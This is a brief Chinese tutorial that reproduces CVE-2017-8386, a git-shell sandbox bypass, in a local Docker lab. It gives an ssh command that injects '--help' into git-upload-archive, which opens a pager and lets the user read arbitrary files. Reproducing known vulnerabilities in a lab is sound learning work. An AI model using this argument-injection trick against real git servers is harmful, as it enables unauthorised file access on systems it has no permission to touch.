GIT (分布式版本控制系统),是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。也是Linus Torvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件
漏洞原理
GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。
漏洞复现
老样子,首先拉去镜像环境
然后查看CVE-2017-8386下的文件
执行chmod,修改属性
然后再执行
ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"
按住shife+e 输入你想要查看的文件 ,就可以查看文件
这样漏洞就复现完成了